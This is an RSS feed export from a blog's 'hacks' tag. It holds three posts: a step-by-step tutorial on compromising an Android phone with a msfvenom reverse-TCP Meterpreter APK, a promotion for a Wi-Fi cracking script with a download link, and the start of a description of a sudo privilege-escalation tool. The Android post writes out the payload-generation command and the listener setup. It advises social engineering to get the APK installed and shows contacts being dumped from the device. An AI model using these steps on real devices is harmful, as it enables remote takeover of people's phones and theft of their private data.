<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>hacks Archives - Tech Chronicles</title>
	<atom:link href="http://kostacipo.stream/tag/hacks/feed/" rel="self" type="application/rss+xml" />
	<link>https://kostacipo.stream/tag/hacks/</link>
	<description>Ramblings of a Tech Dude</description>
	<lastBuildDate>Mon, 26 Oct 2020 00:45:18 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.8.2</generator>

<image>
	<url>https://kostacipo.stream/wp-content/uploads/2019/12/cropped-profile-32x32.jpg</url>
	<title>hacks Archives - Tech Chronicles</title>
	<link>https://kostacipo.stream/tag/hacks/</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux</title>
		<link>http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/</link>
					<comments>http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Mon, 26 Oct 2020 00:45:18 +0000</pubDate>
				<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Mobile]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[android]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[mobile]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1824</guid>

					<description><![CDATA[<p>In this article, we are going to learn how to hack an Android phone using Metasploit framework. Android devices are growing very fast worldwide and actually using a lot of the core capabilities of Linux systems. That is why choosing Android is the best way to learn Mobile Penetration Testing. Here we are using Kali [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/">How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<div class="tdb-block-inner td-fix-index">
<p>In this article, we are going to learn how to hack an Android phone using <a href="https://www.metasploit.com/">Metasploit</a> framework. Android devices are growing very fast worldwide and actually using a lot of the core capabilities of Linux systems. That is why choosing Android is the best way to learn Mobile <a href="https://searchsecurity.techtarget.com/definition/penetration-testing">Penetration Testing</a>.</p>
<p>Here we are using Kali Linux to attack the target. The target has set to be an Android Phone and for that we are using an Android virtual machine. Of course, there are going to be some limitations and differences between a virtual Android and a physical Android device but for the purpose of learning pentesting it is recommended to conduct this test on a virtual device.</p>
<p>We will use msfvenom for creating a payload and save it as an apk file. After generating the payload, we need to setup a listener to Metasploit framework. Once the target downloads and installs the malicious apk then, an attacker can easily get back a meterpreter session on Metasploit. An attacker needs to do some social engineering to install apk on the victim’s mobile device.</p>
<h3><strong>Step by step Tutorial</strong></h3>
<h5><strong>Generating a Payload with msfvenom</strong></h5>
<p>At first, fire up the Kali Linux so that we may generate an apk file as a malicious payload. We need to check our local IP that turns out to be ‘192.168.0.112’. You can also hack an Android device through Internet by using your Public/External IP in the LHOST and by port forwarding.</p>
<p><img fetchpriority="high" decoding="async" class="aligncenter wp-image-6572 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Generating-a-Payload-with-msfvenom.png" sizes="(max-width: 632px) 100vw, 632px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Generating-a-Payload-with-msfvenom.png 632w, https://www.ehacking.net/wp-content/uploads/2020/04/Generating-a-Payload-with-msfvenom-300x161.png 300w" alt="Generating a Payload with msfvenom" width="632" height="340"></p>
<p>After getting your Local host IP use msfvenom tool that will generate a payload to penetrate the Android device. Type command:</p>
<p><strong># msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 R&gt; /var/www/html/ehacking.apk</strong></p>
<p>Where:</p>
<ul>
<li><strong>-p</strong> indicates a payload type</li>
<li><strong>android/metepreter/reverse_tcp</strong> specifies a reverse meterpreter shell would come in from a target Android device</li>
<li><strong>LHOST </strong>is your local IP</li>
<li><strong>LPORT</strong> is set to be as a listening port</li>
<li><strong>R&gt; /var/www/html</strong> would give the output directly on apache server</li>
<li><strong>apk</strong> is the final name of the final output</li>
</ul>
<p>This would take some time to generate an apk file of almost ten thousand bytes.</p>
<p><img decoding="async" class="aligncenter wp-image-6573 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/msfvenom.png" sizes="(max-width: 631px) 100vw, 631px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/msfvenom.png 631w, https://www.ehacking.net/wp-content/uploads/2020/04/msfvenom-300x77.png 300w" alt="msfvenom" width="631" height="162"></p>
<h4><strong>Launching an Attack</strong></h4>
<p>Before launching attack, we need to check the status of the apache server. Type command:</p>
<p><strong># service apache2 status</strong></p>
<p><img decoding="async" class="aligncenter wp-image-6574 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Launching-an-Attack.png" sizes="(max-width: 630px) 100vw, 630px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Launching-an-Attack.png 630w, https://www.ehacking.net/wp-content/uploads/2020/04/Launching-an-Attack-300x160.png 300w" alt="Launching an Attack" width="630" height="337"></p>
<p>All seems set, now fire up msfconsole. Use multi/handler exploit, set payload the same as generated prevoisly, set LHOST and LPORT values same as used in payload and finally type exploit to launch an attack.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6575 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/set-LHOST-and-LPORT.png" sizes="auto, (max-width: 648px) 100vw, 648px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/set-LHOST-and-LPORT.png 648w, https://www.ehacking.net/wp-content/uploads/2020/04/set-LHOST-and-LPORT-300x75.png 300w" alt="set LHOST and LPORT" width="648" height="162"></p>
<p>In real life scenarios, some social engineering techniques can be used to let the target download the malicious apk file. For demonstration we are just accessing the attacker machine to download the file in the Android device.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6576 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device..png" sizes="auto, (max-width: 799px) 100vw, 799px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device..png 799w, https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device.-300x132.png 300w, https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device.-768x337.png 768w, https://www.ehacking.net/wp-content/uploads/2020/04/download-the-file-in-the-Android-device.-696x306.png 696w" alt="download the file in the Android device." width="799" height="351"></p>
<p>After downloading it successfully, select the app to install.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6577 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/After-downloading-it-successfully-select-the-app-to-install..png" sizes="auto, (max-width: 519px) 100vw, 519px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/After-downloading-it-successfully-select-the-app-to-install..png 519w, https://www.ehacking.net/wp-content/uploads/2020/04/After-downloading-it-successfully-select-the-app-to-install.-300x173.png 300w" alt="After downloading it successfully, select the app to install." width="519" height="299"></p>
<p>So far, this option has been seen frequently when we try to install some third-party apps and normally users wont hesitate to allow the installation from unknown sources.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6578 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources..png" sizes="auto, (max-width: 799px) 100vw, 799px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources..png 799w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-300x164.png 300w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-768x419.png 768w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-696x380.png 696w, https://www.ehacking.net/wp-content/uploads/2020/04/the-installation-from-unknown-sources.-770x420.png 770w" alt="the installation from unknown sources." width="799" height="436">Enable the settings to install applications from the third-party sources. And finally hit the install option at the bottom.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6579 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications.png" sizes="auto, (max-width: 800px) 100vw, 800px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications.png 800w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-300x246.png 300w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-768x630.png 768w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-696x571.png 696w, https://www.ehacking.net/wp-content/uploads/2020/04/Enable-the-settings-to-install-applications-512x420.png 512w" alt="Enable the settings to install applications " width="800" height="656">Once the user installs the application and runs it, the meterepreter session would be opened immediatly at the attacking side.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6580 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/opened-immediatly.png" sizes="auto, (max-width: 634px) 100vw, 634px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/opened-immediatly.png 634w, https://www.ehacking.net/wp-content/uploads/2020/04/opened-immediatly-300x58.png 300w" alt="opened immediatly" width="634" height="123"></p>
<h4><strong>Post Exploitation </strong></h4>
<p>Type “background” and then “sessions” to list down all the sessions from where you can see all the IPs connected to the machine.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6581 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Post-Exploitation.png" sizes="auto, (max-width: 638px) 100vw, 638px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Post-Exploitation.png 638w, https://www.ehacking.net/wp-content/uploads/2020/04/Post-Exploitation-300x113.png 300w" alt="Post Exploitation" width="638" height="240"></p>
<p>You can interact with any session by typing <strong>sessions -i [session ID]</strong></p>
<p>After entering the session, type “help” to list down all the commands we can put forward in this session.</p>
<p>You can see some file system commands that are helpful when you’re trying to go after some sensitive information or data. By using these, You can easily download or upload any file or information.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6582 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/file-system-commands.png" sizes="auto, (max-width: 632px) 100vw, 632px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/file-system-commands.png 632w, https://www.ehacking.net/wp-content/uploads/2020/04/file-system-commands-300x191.png 300w" alt="file system commands" width="632" height="402">You will also find some network commands including portfwd and route</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6583 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/portfwd.png" sizes="auto, (max-width: 629px) 100vw, 629px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/portfwd.png 629w, https://www.ehacking.net/wp-content/uploads/2020/04/portfwd-300x89.png 300w" alt="portfwd" width="629" height="186"></p>
<p>Some powerful system commands to get user ID, get a shell or getting the complete system information.</p>
<p>Type “app_list” and it will show you all the installed apps on the device</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6584 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Type-“app_list”-and-it-will-show-you-all-the-installed-apps-on-the-device.png" sizes="auto, (max-width: 628px) 100vw, 628px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Type-“app_list”-and-it-will-show-you-all-the-installed-apps-on-the-device.png 628w, https://www.ehacking.net/wp-content/uploads/2020/04/Type-“app_list”-and-it-will-show-you-all-the-installed-apps-on-the-device-300x198.png 300w" alt="Type “app_list” and it will show you all the installed apps on the device" width="628" height="414">We also have the power to uninstall any app from the Android device</p>
<p><strong><img loading="lazy" decoding="async" class="aligncenter wp-image-6585 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/We-also-have-the-power-to-uninstall-any-app-from-the-Android-device.png" sizes="auto, (max-width: 631px) 100vw, 631px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/We-also-have-the-power-to-uninstall-any-app-from-the-Android-device.png 631w, https://www.ehacking.net/wp-content/uploads/2020/04/We-also-have-the-power-to-uninstall-any-app-from-the-Android-device-300x81.png 300w" alt="We also have the power to uninstall any app from the Android device" width="631" height="170"></strong></p>
<h4><strong>Extracting Contacts from an Android Device</strong></h4>
<p>Now let extract some contacts from the target device by typing “dump” and double tab</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6586 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/Extracting-Contacts-from-an-Android-Device.png" sizes="auto, (max-width: 626px) 100vw, 626px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/Extracting-Contacts-from-an-Android-Device.png 626w, https://www.ehacking.net/wp-content/uploads/2020/04/Extracting-Contacts-from-an-Android-Device-300x19.png 300w" alt="Extracting Contacts from an Android Device" width="626" height="39">It will show all the options to extract from the device. Type “dump_contacts” and enter</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6587 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/dump-contacts.png" sizes="auto, (max-width: 628px) 100vw, 628px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/dump-contacts.png 628w, https://www.ehacking.net/wp-content/uploads/2020/04/dump-contacts-300x35.png 300w" alt="dump_contacts" width="628" height="73">It will extract all the contacts from the Android device and will save it in our local directory. To see this file type “ls” and “cat [file_name]”</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-6588 size-full td-animation-stack-type0-2" src="https://www.ehacking.net/wp-content/uploads/2020/04/cat-file_name.png" sizes="auto, (max-width: 624px) 100vw, 624px" srcset="https://www.ehacking.net/wp-content/uploads/2020/04/cat-file_name.png 624w, https://www.ehacking.net/wp-content/uploads/2020/04/cat-file_name-300x176.png 300w" alt="" width="624" height="367">This would show the content of the contact’s file earlier downloaded from the target device. This information is really sensitive and could be exploited by hackers.</p>
<p>There are lots of more commands available in meterpreter. Further try to explore and learn what we can perform with an Android device. This concludes that we have successfully penetrated the Android device using Kali Linux and Metasploit-Framework.</p>
<p>A healthy tip to secure your Android device is to not install any application from an unknown source, even if you really want to install it, try to read and examine its source code to get an idea whether this file is malicious or not.</p>
</div>
<p>The post <a href="http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/">How to Hack an Android Phone Using Metasploit Msfvenom in Kali Linux</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/how-to-hack-an-android-phone-using-metasploit-msfvenom-in-kali-linux/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>Wifi-Hacker &#8211; Shell Script For Attacking Wireless Connections Using Built-In Kali Tools</title>
		<link>http://kostacipo.stream/wifi-hacker-shell-script-for-attacking-wireless-connections-using-built-in-kali-tools/</link>
					<comments>http://kostacipo.stream/wifi-hacker-shell-script-for-attacking-wireless-connections-using-built-in-kali-tools/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Fri, 28 Feb 2020 10:19:03 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[wifi]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1775</guid>

					<description><![CDATA[<p>&#160; Wifi-Hacker is a Shell Script For Attacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2) &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; &#160; Download Wifi-Hacker</p>
<p>The post <a href="http://kostacipo.stream/wifi-hacker-shell-script-for-attacking-wireless-connections-using-built-in-kali-tools/">Wifi-Hacker &#8211; Shell Script For Attacking Wireless Connections Using Built-In Kali Tools</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>Wifi-Hacker is a Shell Script For Attacking Wireless Connections Using Built-In Kali Tools. Supports All Securities (WEP, WPS, WPA, WPA2)</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-BtLWlh-Rcjc/XlRjzXhrMkI/AAAAAAAARvw/0r9GQsQvb4IHkxHvZzI6zOjm9qsesNHFwCNcBGAsYHQ/s1600/wifi-hacker_1.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-BtLWlh-Rcjc/XlRjzXhrMkI/AAAAAAAARvw/0r9GQsQvb4IHkxHvZzI6zOjm9qsesNHFwCNcBGAsYHQ/s640/wifi-hacker_1.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p><a name="more"></a></p>
<div class="separator"><a href="https://1.bp.blogspot.com/-kgRH3JaJtjk/XlRj1y13oJI/AAAAAAAARwI/T1CNOMVTC-sqUILpyTgzfmA1-RD-BgsFQCNcBGAsYHQ/s1600/wifi-hacker_2.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-kgRH3JaJtjk/XlRj1y13oJI/AAAAAAAARwI/T1CNOMVTC-sqUILpyTgzfmA1-RD-BgsFQCNcBGAsYHQ/s640/wifi-hacker_2.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-c1AH1lkAH-E/XlRj3Kcv8qI/AAAAAAAARwU/soTd-ADpzL8qWXEiCX-qMUUKVXtFgYMXwCNcBGAsYHQ/s1600/wifi-hacker_3.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-c1AH1lkAH-E/XlRj3Kcv8qI/AAAAAAAARwU/soTd-ADpzL8qWXEiCX-qMUUKVXtFgYMXwCNcBGAsYHQ/s640/wifi-hacker_3.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-jU48cvvGX1M/XlRj2w1TMOI/AAAAAAAARwM/Nuui9fM-4Pw_neifsGXOjXjZzQq2-DHkQCNcBGAsYHQ/s1600/wifi-hacker_4.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-jU48cvvGX1M/XlRj2w1TMOI/AAAAAAAARwM/Nuui9fM-4Pw_neifsGXOjXjZzQq2-DHkQCNcBGAsYHQ/s640/wifi-hacker_4.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-nNGdm8niHaM/XlRj22trZFI/AAAAAAAARwQ/TOoTp8Of_VM-p_4m7D6J-PHzjOIIsCC4ACNcBGAsYHQ/s1600/wifi-hacker_5.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-nNGdm8niHaM/XlRj22trZFI/AAAAAAAARwQ/TOoTp8Of_VM-p_4m7D6J-PHzjOIIsCC4ACNcBGAsYHQ/s640/wifi-hacker_5.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-iz9AgmF1CCk/XlRj37opT4I/AAAAAAAARwY/2eOwAPrKt10d1CjGI5oOmZ0cpsKr1ZGTgCNcBGAsYHQ/s1600/wifi-hacker_6.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-iz9AgmF1CCk/XlRj37opT4I/AAAAAAAARwY/2eOwAPrKt10d1CjGI5oOmZ0cpsKr1ZGTgCNcBGAsYHQ/s640/wifi-hacker_6.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-gcNpd4pVy74/XlRj4ekFGdI/AAAAAAAARwc/7mG2-BaX4LsQU6ytZr9kAxgxY2b9H1JagCNcBGAsYHQ/s1600/wifi-hacker_7.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-gcNpd4pVy74/XlRj4ekFGdI/AAAAAAAARwc/7mG2-BaX4LsQU6ytZr9kAxgxY2b9H1JagCNcBGAsYHQ/s640/wifi-hacker_7.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-rLXbDBkOwaA/XlRj4ZAcOdI/AAAAAAAARwg/NA1UwwcW5WYf9u2m5MY1qh6V8yu6_gFJACNcBGAsYHQ/s1600/wifi-hacker_8.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-rLXbDBkOwaA/XlRj4ZAcOdI/AAAAAAAARwg/NA1UwwcW5WYf9u2m5MY1qh6V8yu6_gFJACNcBGAsYHQ/s640/wifi-hacker_8.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-VIXfCbdcYKs/XlRj49OYn0I/AAAAAAAARwk/Pyw7kuxPDFoSCJC2UAe8M3y_idCb2grBACNcBGAsYHQ/s1600/wifi-hacker_9.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-VIXfCbdcYKs/XlRj49OYn0I/AAAAAAAARwk/Pyw7kuxPDFoSCJC2UAe8M3y_idCb2grBACNcBGAsYHQ/s640/wifi-hacker_9.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-2XaO7UetD5c/XlRjzYaidkI/AAAAAAAARvs/KEEbD98LrJQ_6QzPrP1wLWgeRbZAvlzNgCNcBGAsYHQ/s1600/wifi-hacker_10.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-2XaO7UetD5c/XlRjzYaidkI/AAAAAAAARvs/KEEbD98LrJQ_6QzPrP1wLWgeRbZAvlzNgCNcBGAsYHQ/s640/wifi-hacker_10.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-Odnl-J-UUjE/XlRjzR0iERI/AAAAAAAARv0/M9Y_bfm3ilQSC7HrMKri0SwCLXP-_ABzACNcBGAsYHQ/s1600/wifi-hacker_11.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-Odnl-J-UUjE/XlRjzR0iERI/AAAAAAAARv0/M9Y_bfm3ilQSC7HrMKri0SwCLXP-_ABzACNcBGAsYHQ/s640/wifi-hacker_11.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-Iw8qk9y5DiQ/XlRj0m6286I/AAAAAAAARv4/remWsUFV82IVuIASxjorq04GCyxL5ufzQCNcBGAsYHQ/s1600/wifi-hacker_12.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-Iw8qk9y5DiQ/XlRj0m6286I/AAAAAAAARv4/remWsUFV82IVuIASxjorq04GCyxL5ufzQCNcBGAsYHQ/s640/wifi-hacker_12.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-280HM98BfGk/XlRj0iEOjAI/AAAAAAAARv8/KphStxEhz-UnfThZWC88unmnFwkQyiu4QCNcBGAsYHQ/s1600/wifi-hacker_13.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-280HM98BfGk/XlRj0iEOjAI/AAAAAAAARv8/KphStxEhz-UnfThZWC88unmnFwkQyiu4QCNcBGAsYHQ/s640/wifi-hacker_13.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-0livR3QhN8o/XlRj1rMToiI/AAAAAAAARwA/_PEHQyQUZmgzczctGNjR26LnTIDBfTCigCNcBGAsYHQ/s1600/wifi-hacker_14.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-0livR3QhN8o/XlRj1rMToiI/AAAAAAAARwA/_PEHQyQUZmgzczctGNjR26LnTIDBfTCigCNcBGAsYHQ/s640/wifi-hacker_14.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div class="separator"><a href="https://1.bp.blogspot.com/-iXilup8PMvs/XlRj1tjmAVI/AAAAAAAARwE/-Mc9XsCzgyg2PA42tX1WE5h6P8WnTDUvgCNcBGAsYHQ/s1600/wifi-hacker_15.jpeg"><img loading="lazy" decoding="async" src="https://1.bp.blogspot.com/-iXilup8PMvs/XlRj1tjmAVI/AAAAAAAARwE/-Mc9XsCzgyg2PA42tX1WE5h6P8WnTDUvgCNcBGAsYHQ/s640/wifi-hacker_15.jpeg" data-original-height="768" data-original-width="1366" width="640" height="358" border="0"></a></div>
<p>&nbsp;</p>
<div><b><a class="kiploit-download" title="Download Wifi-Hacker" href="https://github.com/esc0rtd3w/wifi-hacker" target="_blank" rel="nofollow noopener noreferrer">Download Wifi-Hacker</a></b></div>
<p>The post <a href="http://kostacipo.stream/wifi-hacker-shell-script-for-attacking-wireless-connections-using-built-in-kali-tools/">Wifi-Hacker &#8211; Shell Script For Attacking Wireless Connections Using Built-In Kali Tools</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>http://kostacipo.stream/wifi-hacker-shell-script-for-attacking-wireless-connections-using-built-in-kali-tools/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>SUDO_KILLER &#8211; A Tool To Identify And Exploit Sudo Rules&#8217; Misconfigurations And Vulnerabilities Within Sudo</title>
		<link>http://kostacipo.stream/sudo_killer-a-tool-to-identify-and-exploit-sudo-rules-misconfigurations-and-vulnerabilities-within-sudo/</link>
					<comments>http://kostacipo.stream/sudo_killer-a-tool-to-identify-and-exploit-sudo-rules-misconfigurations-and-vulnerabilities-within-sudo/#respond</comments>
		
		<dc:creator><![CDATA[Majordomo]]></dc:creator>
		<pubDate>Wed, 26 Feb 2020 10:56:35 +0000</pubDate>
				<category><![CDATA[Cybersecurity]]></category>
		<category><![CDATA[Hacks]]></category>
		<category><![CDATA[Linux]]></category>
		<category><![CDATA[Pentesting]]></category>
		<category><![CDATA[hacks]]></category>
		<category><![CDATA[linux]]></category>
		<guid isPermaLink="false">http://www.kostacipo.stream/?p=1764</guid>

					<description><![CDATA[<p>&#160; This post describes how to obtain Linux Privilege Escalation through SUDO abuse. The tool can be used by pentesters, system admins, CTF players, students, System Auditors and trolls :). INTRO**WARNING: SUDO_KILLER is part of the KILLER project. SUDO_KILLER is still under development and there might be some issues, please create an issue if you [&#8230;]</p>
<p>The post <a href="http://kostacipo.stream/sudo_killer-a-tool-to-identify-and-exploit-sudo-rules-misconfigurations-and-vulnerabilities-within-sudo/">SUDO_KILLER &#8211; A Tool To Identify And Exploit Sudo Rules&#8217; Misconfigurations And Vulnerabilities Within Sudo</a> appeared first on <a href="http://kostacipo.stream">Tech Chronicles</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>&nbsp;</p>
<p>This post describes how to obtain Linux Privilege Escalation through SUDO abuse.</p>
<p>The tool can be used by pentesters, system admins, CTF players, students, System Auditors and trolls :).<br /><a name="more"></a><br /><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (16)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-intro"></a> <br /><b>INTRO</b><br />**WARNING: SUDO_KILLER is part of the KILLER project. SUDO_KILLER is still under development and there might be some issues, please create an issue if you found any. **<br /><strong>Other tool will be added to the KILLER project in the coming months so stay tuned up. </strong></p>
<p><a title="A tool to identify and exploit sudo rules' misconfigurations and vulnerabilities within sudo (20)" href="https://draft.blogger.com/null" target="_blank" rel="noopener noreferrer" name="user-content-overview"></a> <br /><b>Overview</b><br /><em>SUDO_KILLER</em> is a tool that can be used for privilege escalation on linux environment by abusing SUDO in several ways. The tool helps to identify <a title="misconfiguration" href="https://www.kitploit.com/search/label/Misconfiguration" target="_blank" rel="noopener noreferrer">misconfiguration</a> within sudo rules, <a title="vulnerability" href="https://www.kitploit.com/search/label/Vulnerability" target="_blank" rel="noopener noreferrer">vulnerability</a> within the version of sudo being used (CVEs and vulns) and the use of dangerous binary, all of these could be abused to elevate privilege to ROOT.<br /><em>SUDO_KILLER</em> will then provide a list of commands or local exploits which could be exploited to elevate privilege. It is worth noting that the tool does not perform any exploitation on your behalf, the exploitation will need to be performed manually and this is intended.</p>
